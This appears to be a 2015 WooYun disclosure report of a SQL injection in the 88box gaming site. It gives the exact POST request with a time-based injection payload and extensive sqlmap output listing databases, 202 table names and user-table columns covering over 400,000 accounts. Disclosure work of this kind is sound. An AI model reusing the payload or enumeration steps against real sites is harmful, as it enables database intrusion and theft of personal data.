当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123876

漏洞标题:88box某處SQL注入(8庫涉及至少40萬+的用戶信息)

相关厂商:Hitcon台湾互联网漏洞报告平台

漏洞作者: 天地不仁 以万物为刍狗

提交时间:2015-07-01 13:32

修复时间:2015-08-17 11:30

公开时间:2015-08-17 11:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-01: 细节已通知厂商并且等待厂商处理中
2015-07-03: 厂商已经确认,细节仅向厂商公开
2015-07-13: 细节向核心白帽子及相关领域专家公开
2015-07-23: 细节向普通白帽子公开
2015-08-02: 细节向实习白帽子公开
2015-08-17: 细节向公众公开

简要描述:

跑用戶信息數量用了快一天 只為了能上一次首頁 我也是醉了

详细说明:

POST數據包:

POST /default/index/count_cap_click HTTP/1.1
Content-Length: 161
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.88box.com:80/
Cookie: PHPSESSID=ns70inunran37jalagg5nvhte0; CUSTOMER=%25E9%2581%258A%25E5%25AE%25A259689008; lastReadChapter=%2Fftxs%2Findex%2Fread%3Fcid%3D2810; capRand=278194410; hasShowCap=1; HMACCOUNT=61603283CAC31CDA; Hm_lvt_58093a0aec41f056e814041b8e3bbf17=1435673732,1435674082,1435674176,1435674233; Hm_lpvt_58093a0aec41f056e814041b8e3bbf17=1435674233; B=e90mephap594s&b=3&s=fl
Host: www.88box.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
pid=1&random=278194410&url=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/


URL處 可注入(8庫)

0.png


跑了下 88box_platform 的數據庫 有 202 張表

1.png


具體的我就沒跑完了 看見了一個 user 的表 就跑了下 這個表的數量 328631 涉及用戶賬號 密碼 郵箱 密保問題 答案等

2.png


順便也看了下 88box_thai 數據庫的數量(7萬+的用戶信息)

4.png


數據庫 88box_platfrom2 等其他數據庫就沒看了 但是也有 user 表 所以已知的至少40萬+的用戶信息可被洩露

3.png


漏洞证明:

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: #1* ((custom) POST)
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: pid=1&random=278194410&url=if(now()=sysdate(),sleep(0),0)/';(SELECT
 * FROM (SELECT(SLEEP(5)))hQoa)#'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(n
ow()=sysdate(),sleep(0),0))OR"/
---
[13:06:59] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.28
back-end DBMS: MySQL 5.0.11
[13:06:59] [INFO] fetching database names
[13:06:59] [INFO] fetching number of databases
[13:06:59] [INFO] resumed: 8
[13:06:59] [INFO] resumed: information_schema
[13:06:59] [INFO] resumed: 88box_platform
[13:06:59] [INFO] resumed: 88box_platfrom2
[13:06:59] [INFO] resumed: 88box_thai
[13:06:59] [INFO] resumed: ad_db
[13:06:59] [INFO] resumed: mysql
[13:06:59] [INFO] resumed: performance_schema
[13:06:59] [INFO] resumed: test
available databases [8]:
[*] `88box_platform`
[*] `88box_platfrom2`
[*] `88box_thai`
[*] ad_db
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[13:06:59] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\www.88box.com'
[*] shutting down at 13:06:59


Database: 88box_thai
+-----------------------------+---------+
| Table                       | Entries |
+-----------------------------+---------+
| login_logs                  | 409894  |
| websites_view_count         | 125166  |
| register_logs               | 81342   |
| vw_channel_register         | 81342   |
| vw_register_logs            | 81342   |
| facebook_user_basic_infos   | 75176   |
| facebook_user_app_used      | 75171   |
| users                       | 73498   |
| ew_role_info                | 16190   |
| vw_payment                  | 10583   |
| vw_payment_logs             | 10583   |
| payment_logs                | 10582   |
| serial_number_logs          | 6573    |
| vw_serial_number_logs       | 6573    |
| user_activities             | 4987    |
| vw_user_activities          | 4987    |
| google_keywords             | 4908    |
| vw_channel_activities_count | 4479    |
| co_partner_users            | 4046    |
| vw_co_partner_users         | 4046    |
| channel_cost_daily          | 3486    |
| vw_channel_cost_daily       | 3486    |
| vw_channel_payment_count    | 2519    |
| user_activities_demo        | 2459    |
| vw_user_activities_demo     | 2459    |
| vw_ew_reg_logs_count        | 2372    |
| count_cap_logs              | 2217    |
| ad_view_count               | 1685    |
| vw_ad_view_count            | 1685    |
| vw_ew_role_logs_count       | 1680    |
| vw_ew_reg_param_logs_count  | 1125    |
| ad_click_count              | 1014    |
| vw_ad_click_count           | 1014    |
| vw_ew_role_param_logs_count | 960     |
| ad_img                      | 893     |
| offer_config                | 637     |
| ew_signin_logs              | 348     |
| auto_service_question       | 292     |
| ew_activities_logs          | 179     |
| articles                    | 169     |
| vip_messages                | 165     |
| menus                       | 163     |
| vw_articles                 | 162     |
| apk_click_count             | 161     |
| vw_bankpay_logs             | 127     |
| bankpay_logs                | 126     |
| ds_role_info                | 100     |
| channel_url                 | 97      |
| channels                    | 30      |
| permission                  | 26      |
| admins                      | 25      |
| mycard_info                 | 25      |
| vw_admins                   | 25      |
| change_ad_map               | 22      |
| game_servers                | 19      |
| vw_game_servers             | 16      |
| game_advertise_fee          | 14      |
| vw_game_advertise_fee       | 14      |
| serial_number_types         | 10      |
| article_categories          | 9       |
| vw_article_categories       | 8       |
| payways                     | 6       |
| facebook_apps               | 5       |
| month_rate                  | 5       |
| game_server_states          | 4       |
| vw_websites                 | 3       |
| websites                    | 3       |
| developers                  | 2       |
| games                       | 2       |
| vw_games                    | 2       |
+-----------------------------+---------+
[13:19:55] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\www.88box.com'
[*] shutting down at 13:19:55


Database: 88box_platform
Table: users
[21 columns]
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| ANSWER         | varchar(200) |
| ANSWER1        | varchar(200) |
| BBS_NICKNAME   | varchar(50)  |
| EMAIL          | varchar(200) |
| EXT_1          | tinyint(4)   |
| EXT_2          | int(11)      |
| EXT_3          | varchar(50)  |
| EXT_4          | varchar(200) |
| GENDER         | tinyint(4)   |
| ID             | int(11)      |
| ID_CARD_NUMBER | varchar(18)  |
| IM             | varchar(200) |
| LOGIN_ACCOUNT  | varchar(50)  |
| NAME           | varchar(20)  |
| PASSWORD       | char(40)     |
| PHONE          | varchar(50)  |
| QUESTION       | varchar(200) |
| QUESTION1      | varchar(200) |
| SYSTEM_ACCOUNT | varchar(50)  |
| USER_TYPE      | int(11)      |
| VALID          | tinyint(4)   |
+----------------+--------------+
[13:25:54] [INFO] resumed: 328631
Database: 88box_platform
+-------+---------+
| Table | Entries |
+-------+---------+
| users | 328631  |
+-------+---------+
[13:25:54] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\www.88box.com'
[*] shutting down at 13:25:54


[13:11:16] [INFO] fetching tables for database: '88box_platform'
[13:11:16] [INFO] fetching number of tables for database '88box_platform'
[13:11:16] [INFO] resumed: 202
[13:11:16] [INFO] resumed: ad_click_count
[13:11:16] [INFO] resumed: ad_img
[13:11:16] [INFO] resumed: ad_view_count
[13:11:16] [INFO] resumed: admins
[13:11:16] [INFO] resumed: advertise_fee
[13:11:16] [INFO] resumed: article_categories
[13:11:16] [INFO] resumed: articles
[13:11:16] [INFO] resumed: auto_bankpay_logs
[13:11:16] [INFO] resumed: auto_service_question
[13:11:16] [INFO] resumed: bank_pay_states
[13:11:16] [INFO] resumed: bankpay_logs
[13:11:16] [INFO] resumed: change_ad_map
[13:11:16] [INFO] resumed: channel_cost_daily
[13:11:16] [INFO] resumed: channel_url
[13:11:16] [INFO] resumed: channels
[13:11:16] [INFO] resumed: chat_customer_service
[13:11:16] [INFO] resumed: chat_messages
[13:11:16] [INFO] resumed: chat_rates
[13:11:16] [INFO] resumed: christmas_activities_logs
[13:11:16] [INFO] resumed: christmas_signin_logs
[13:11:16] [INFO] resumed: co_partner_payment_logs
[13:11:16] [INFO] resumed: co_partner_users
[13:11:16] [INFO] resumed: co_partners
[13:11:16] [INFO] resumed: co_partners_url
[13:11:16] [INFO] resumed: contract_rule
[13:11:16] [INFO] resumed: count_cap_logs
[13:11:16] [INFO] resumed: count_pa_activities_logs
[13:11:16] [INFO] resumed: currencies
[13:11:16] [INFO] resumed: developers
[13:11:16] [INFO] resumed: dragonboat_activities_logs
[13:11:16] [INFO] resumed: dragonboat_sign_logs
[13:11:16] [INFO] resumed: edm_pa_click_count
[13:11:16] [INFO] resumed: evil_activities_logs
[13:11:16] [INFO] resumed: evil_activities_logs2
[13:11:16] [INFO] resumed: evil_activities_logs3
[13:11:16] [INFO] resumed: evil_add_award
[13:11:16] [INFO] resumed: evil_client_down_count
[13:11:16] [INFO] resumed: evil_download_html_view_count
[13:11:16] [INFO] resumed: evil_promote_activities_logs
[13:11:16] [INFO] resumed: evil_promote_rose_logs
[13:11:16] [INFO] resumed: evil_promote_share_logs
[13:11:16] [INFO] resumed: evil_role_info
[13:11:16] [INFO] resumed: evil_role_power
[13:11:16] [INFO] resumed: evil_share_logs
[13:11:16] [INFO] resumed: facebook_advert_changes
[13:11:16] [INFO] resumed: facebook_apps
[13:11:16] [INFO] resumed: facebook_invited
[13:11:16] [INFO] resumed: facebook_invited_logs
[13:11:16] [INFO] resumed: facebook_user_app_used
[13:11:16] [INFO] resumed: facebook_user_basic_infos
[13:11:16] [INFO] resumed: ft_activities_logs
[13:11:16] [INFO] resumed: ft_enrol_activities
[13:11:16] [INFO] resumed: ft_login_10_8
[13:11:16] [INFO] resumed: ft_role_info
[13:11:16] [INFO] resumed: ft_share_activities_logs
[13:11:16] [INFO] resumed: game_advertise_fee
[13:11:16] [INFO] resumed: game_menus
[13:11:16] [INFO] resumed: game_rates
[13:11:16] [INFO] resumed: game_server_states
[13:11:16] [INFO] resumed: game_servers
[13:11:16] [INFO] resumed: games
[13:11:16] [INFO] resumed: gashplus_payment_logs
[13:11:16] [INFO] resumed: google_keywords
[13:11:16] [INFO] resumed: googleplay_payment_log
[13:11:16] [INFO] resumed: gs_pay_workflow
[13:11:16] [INFO] resumed: gs_servers
[13:11:16] [INFO] resumed: gs_task_logs
[13:11:16] [INFO] resumed: imoney_payment_logs
[13:11:16] [INFO] resumed: jump_link_count
[13:11:16] [INFO] resumed: kt_activities10_logs
[13:11:16] [INFO] resumed: kt_activities11_logs
[13:11:16] [INFO] resumed: kt_activities12_logs
[13:11:16] [INFO] resumed: kt_activities13_logs
[13:11:16] [INFO] resumed: kt_activities2_logs
[13:11:16] [INFO] resumed: kt_activities3_logs
[13:11:16] [INFO] resumed: kt_activities4_logs
[13:11:16] [INFO] resumed: kt_activities5_logs
[13:11:16] [INFO] resumed: kt_activities6_logs
[13:11:16] [INFO] resumed: kt_activities7_logs
[13:11:16] [INFO] resumed: kt_activities8_logs
[13:11:16] [INFO] resumed: kt_activities9_logs
[13:11:16] [INFO] resumed: kt_activities_logs
[13:11:16] [INFO] resumed: kt_enrol_first_award
[13:11:16] [INFO] resumed: kt_role_info
[13:11:16] [INFO] resumed: kt_s18
[13:11:16] [INFO] resumed: laborday_activities_logs
[13:11:16] [INFO] resumed: laborday_signin_logs
[13:11:16] [INFO] resumed: login_logs
[13:11:16] [INFO] resumed: lp_impression_logs
[13:11:16] [INFO] resumed: menus
[13:11:16] [INFO] resumed: modify_email_request
[13:11:16] [INFO] resumed: mol_points_payment_logs
[13:11:16] [INFO] resumed: month_rate
[13:11:16] [INFO] resumed: mycard_info
[13:11:16] [INFO] resumed: mycard_trade_logs
[13:11:16] [INFO] resumed: mycard_tw_trade_logs
[13:11:16] [INFO] resumed: offer_config
[13:11:16] [INFO] resumed: order_qc_info
[13:11:16] [INFO] resumed: our_games
[13:11:16] [INFO] resumed: pa_activities_logs
[13:11:16] [INFO] resumed: pa_role_info
[13:11:16] [INFO] resumed: pa_share_logs
[13:11:16] [INFO] resumed: pay_check_order
[13:11:16] [INFO] resumed: payment_logs
[13:11:16] [INFO] resumed: paypal_logs
[13:11:16] [INFO] resumed: payways
[13:11:16] [INFO] resumed: pepay_message
[13:11:16] [INFO] resumed: pepay_payment_logs
[13:11:16] [INFO] resumed: permission
[13:11:16] [INFO] resumed: platform_coin
[13:11:16] [INFO] resumed: platform_coin_logs
[13:11:16] [INFO] resumed: qm_activities_logs
[13:11:16] [INFO] resumed: qm_subscribe_logs
[13:11:16] [INFO] resumed: qn_role_info
[13:11:16] [INFO] resumed: register_logs
[13:11:16] [INFO] resumed: serial_number_logs
[13:11:16] [INFO] resumed: serial_number_types
[13:11:16] [INFO] resumed: sf_activities_logs
[13:11:16] [INFO] resumed: sf_get_card_logs
[13:11:16] [INFO] resumed: sf_signin_logs
[13:11:16] [INFO] resumed: test_payment_logs
[13:11:16] [INFO] resumed: user_activities
[13:11:16] [INFO] resumed: user_activities_demo
[13:11:16] [INFO] resumed: users
[13:11:16] [INFO] resumed: vip_assign_logs
[13:11:16] [INFO] resumed: vip_messages
[13:11:16] [INFO] resumed: vip_player_info
[13:11:16] [INFO] resumed: vip_rates
[13:11:16] [INFO] resumed: vip_system_game_list
[13:11:16] [INFO] resumed: vip_system_permission
[13:11:16] [INFO] resumed: vip_system_users_list
[13:11:16] [INFO] resumed: vw_14_role_param_percent_logs
[13:11:16] [INFO] resumed: vw_14_role_percent_logs
[13:11:16] [INFO] resumed: vw_15_role_param_percent_logs
[13:11:16] [INFO] resumed: vw_15_role_percent_logs
[13:11:16] [INFO] resumed: vw_18_role_param_percent_logs
[13:11:16] [INFO] resumed: vw_18_role_percent_logs
[13:11:16] [INFO] resumed: vw_ad_click_count
[13:11:16] [INFO] resumed: vw_ad_view_count
[13:11:16] [INFO] resumed: vw_admins
[13:11:16] [INFO] resumed: vw_article_categories
[13:11:16] [INFO] resumed: vw_articles
[13:11:16] [INFO] resumed: vw_bankpay_logs
[13:11:16] [INFO] resumed: vw_channel_activities_count
[13:11:16] [INFO] resumed: vw_channel_cost_daily
[13:11:16] [INFO] resumed: vw_channel_payment_count
[13:11:16] [INFO] resumed: vw_channel_register
[13:11:16] [INFO] resumed: vw_channel_register_analysis
[13:11:16] [INFO] resumed: vw_channel_register_count
[13:11:16] [INFO] resumed: vw_co_14_role_percent_logs
[13:11:16] [INFO] resumed: vw_co_15_role_percent_logs
[13:11:16] [INFO] resumed: vw_co_18_role_percent_logs
[13:11:16] [INFO] resumed: vw_co_evil_reg_logs_count
[13:11:16] [INFO] resumed: vw_co_evil_role_logs_count
[13:11:16] [INFO] resumed: vw_co_evil_role_percent_logs
[13:11:16] [INFO] resumed: vw_co_ft_reg_logs_count
[13:11:16] [INFO] resumed: vw_co_ft_role_logs_count
[13:11:16] [INFO] resumed: vw_co_ft_role_percent_logs
[13:11:16] [INFO] resumed: vw_co_pa_reg_logs_count
[13:11:16] [INFO] resumed: vw_co_pa_role_logs_count
[13:11:16] [INFO] resumed: vw_co_pa_role_percent_logs
[13:11:16] [INFO] resumed: vw_co_partner_payment_logs
[13:11:16] [INFO] resumed: vw_co_partner_users
[13:11:16] [INFO] resumed: vw_contract_rule
[13:11:16] [INFO] resuming partial value: vw_evil_reg
[13:11:16] [WARNING] multi-threading is considered unsafe in time-based data ret
rieval. Going to switch it off automatically
[13:11:16] [WARNING] time-based comparison requires larger statistical model, pl
ease wait..............................


do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
1
[10:33:26] [INFO] adjusting time delay to 1 second due to good response times
75
[10:33:30] [INFO] retrieved: ad_click_count
[10:34:45] [INFO] retrieved: ad_img
[10:35:05] [INFO] retrieved: ad_view_count
[10:36:06] [INFO] retrieved: admins
[10:36:31] [INFO] retrieved: advertise_fee
[10:37:31] [INFO] retrieved: article_categories
[10:39:02] [ERROR] invalid character detected. retrying..
[10:39:02] [WARNING] increasing time delay to 2 seconds
[10:39:03] [INFO] retrieved: articles
[10:39:29] [INFO] retrieved: auto_bankpay_logs
[10:42:09] [INFO] retrieved: auto_service_question
[10:44:46] [INFO] retrieved: bank_pay_states
[10:47:06] [INFO] retrieved: bankpay_logs
[10:48:37] [INFO] retrieved: change_ad_map
[10:50:36] [INFO] retrieved: channel_cost_daily
[10:53:01] [INFO] retrieved: channel_url
[10:53:50] [INFO] retrieved: channels
[10:54:15] [INFO] retrieved: chat_customer_ser
[10:56:39] [INFO] adjusting time delay to 1 second due to good response times
vice
[10:56:58] [INFO] retrieved: chat_messages
[10:57:44] [INFO] retrieved: chat_rates
[10:58:16] [INFO] retrieved: christmas_activities_logs
[11:00:20] [INFO] retrieved: christmas_signin_logs
[11:01:35] [INFO] retrieved: co_partner_payment_logs
[11:03:43] [INFO] retrieved: co_partner_users
[11:04:23] [INFO] retrieved: co_partners
[11:04:41] [INFO] retrieved: co_partners_url
[11:05:18] [INFO] retrieved: contract_rule
[11:06:22] [INFO] retrieved: count_cap_logs
[11:07:34] [INFO] retrieved: count_pa_activities_logs
[11:09:18] [INFO] retrieved: currencies
[11:10:05] [INFO] retrieved: developers
[11:11:02] [INFO] retrieved: edm_pa_click_count
[11:12:40] [INFO] retrieved: evil_activities_logs
[11:14:25] [INFO] retrieved: evil_add_award
[11:15:14] [INFO] retrieved: evil_client_down_count
[11:16:58] [INFO] retrieved: evil_download_html_view_count
[11:19:24] [INFO] retrieved: evil_role_i
[11:20:08] [ERROR] invalid character detected. retrying..
[11:20:08] [WARNING] increasing time delay to 2 seconds
nfo
[11:20:41] [INFO] retrieved: evil_role_power
[11:21:57] [INFO] retrieved: evil_share_logs
[11:23:44] [INFO] retrieved: facebook_advert_changes
[11:27:12] [INFO] retrieved: facebook_apps
[11:28:11] [INFO] retrieved: facebook_invited
[11:29:37] [INFO] retrieved: facebook_invited_logs
[11:31:05] [INFO] retrieved: facebook_user_app_used
[11:33:31] [INFO] retrieved: facebook_user_basic_infos
[11:35:39] [INFO] retrieved: ft_activities_logs
[11:38:23] [INFO] retrieved: ft_enro
[11:39:11] [INFO] adjusting time delay to 1 second due to good response times
l_activities
[11:40:13] [INFO] retrieved: ft_login_10_8
[11:41:15] [INFO] retrieved: ft_role_info
[11:42:10] [INFO] retrieved: ft_share_activities
[11:43:40] [ERROR] invalid character detected. retrying..
[11:43:40] [WARNING] increasing time delay to 2 seconds
_logs
[11:44:33] [INFO] retrieved: game_advertise_fee
[11:47:08] [INFO] retrieved: game_menus
[11:48:06] [INFO] retrieved: game_rates
[11:49:00] [INFO] retrieved: game_server_states
[11:51:12] [INFO] retrieved: game_servers
[11:51:46] [INFO] retrieved: games
[11:52:05] [INFO] retrieved: gashplus_payment_logs
[11:55:26] [INFO] retrieved: google_keywords
[11:57:48] [INFO] retrieved: googleplay_payment_log
[12:00:43] [INFO] retrieved: gs_pa
[12:01:27] [INFO] adjusting time delay to 1 second due to good response times
y_workflow
[12:02:26] [INFO] retrieved: imoney_payment_logs
[12:04:14] [INFO] retrieved: jump_link_count
[12:05:42] [INFO] retrieved: kt_activities10_logs
[12:07:31] [INFO] retrieved: kt_activities11_logs
[12:08:21] [INFO] retrieved: kt_activities2_logs
[12:09:12] [INFO] retrieved: kt_activities3_logs
[12:10:02] [INFO] retrieved: kt_activities4_logs
[12:10:53] [INFO] retrieved: kt_activities5_logs
[12:11:44] [INFO] retrieved: kt_activities6_logs
[12:12:35] [INFO] retrieved: kt_activities7_logs
[12:13:27] [INFO] retrieved: kt_activities8_logs
[12:14:20] [INFO] retrieved: kt_activities9_logs
[12:15:10] [INFO] retrieved: kt_activities_logs
[12:15:56] [INFO] retrieved: kt_enrol_first_award
[12:17:33] [INFO] retrieved: kt_s18
[12:17:53] [INFO] retrieved: laborday_activities_logs
[12:19:59] [INFO] retrieved: laborday_signin_logs
[12:21:12] [INFO] retrieved: login_logs
[12:22:06] [INFO] retrieved: menus
[12:22:34] [INFO] retrieved: modify_email_request
[12:24:15] [INFO] retrieved: mol_points_payment_logs
[12:26:50] [INFO] retrieved: month_rate
[12:27:38] [INFO] retrieved: mycard_info
[12:28:33] [INFO] retrieved: mycard_trade_logs
[12:29:45] [INFO] retrieved: mycard_tw_trade_logs
[12:31:03] [INFO] retrieved: offer_config
[12:32:09] [INFO] retrieved: order_qc_info
[12:33:16] [INFO] retrieved: pa_activities_logs
[12:34:53] [INFO] retrieved: pa_role_info
[12:35:49] [INFO] retrieved: pa_share_logs
[12:36:48] [INFO] retrieved: payment_logs
[12:37:49] [INFO] retrieved: paypal_logs
[12:38:40] [INFO] retrieved: payways
[12:39:05] [INFO] retrieved: pepay_message
[12:40:08] [INFO] retrieved: pepay_payment_logs
[12:41:24] [INFO] retrieved: permission
[12:42:11] [INFO] retrieved: platform_coin
[12:43:19] [INFO] retrieved: platform_coin_logs
[12:44:05] [INFO] retrieved: qm_activities_logs
[12:45:41] [INFO] retrieved: qm_subscribe_logs
[12:46:59] [INFO] retrieved: register_logs
[12:48:11] [INFO] retrieved: serial_number_logs
[12:49:48] [INFO] retrieved: serial_number_types
[12:50:36] [ERROR] invalid character detected. retrying..
[12:50:36] [WARNING] increasing time delay to 2 seconds
[12:50:38] [INFO] retrieved: sf_activities_logs
[12:53:20] [INFO] retrieved: sf_get_card_logs
[12:55:31] [INFO] retrieved: sf_signin_logs
[12:57:27] [INFO] retrieved: test_payment_logs
[13:00:18] [INFO] retrieved: user_activities
[13:02:31] [INFO] retrieved: user_activities_demo
[13:03:53] [INFO] retrieved: users
[13:04:13] [INFO] retrieved: vip_messages
[13:06:04] [INFO] retrieved: vip_player_inf
[13:07:50] [INFO] adjusting time delay to 1 second due to good response times
o
[13:07:56] [INFO] retrieved: vip_rates
[13:08:27] [INFO] retrieved: vw_14_role_param_percent_logs
[13:11:05] [INFO] retrieved: vw_14_role_percent_logs
[13:12:22] [INFO] retrieved: vw_15_role_param_percent_logs
[13:14:48] [INFO] retrieved: vw_15_role_percent_logs
[13:16:04] [INFO] retrieved: vw_18_role_param_percent_logs
[13:18:28] [INFO] retrieved: vw_18_role_percent_logs
[13:19:43] [INFO] retrieved: vw_ad_click_count
[13:21:01] [INFO] retrieved: vw_ad_view_count
[13:22:04] [INFO] retrieved: vw_admins
[13:22:32] [INFO] retrieved: vw_article_categories
[13:24:02] [INFO] retrieved: vw_articles
[13:24:20] [INFO] retrieved: vw_bankpay_logs
[13:25:30] [INFO] retrieved: vw_channel_activi

修复方案:

版权声明:转载请注明来源 天地不仁 以万物为刍狗@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-07-03 11:28

厂商回复:

感謝通報!!

最新状态:

暂无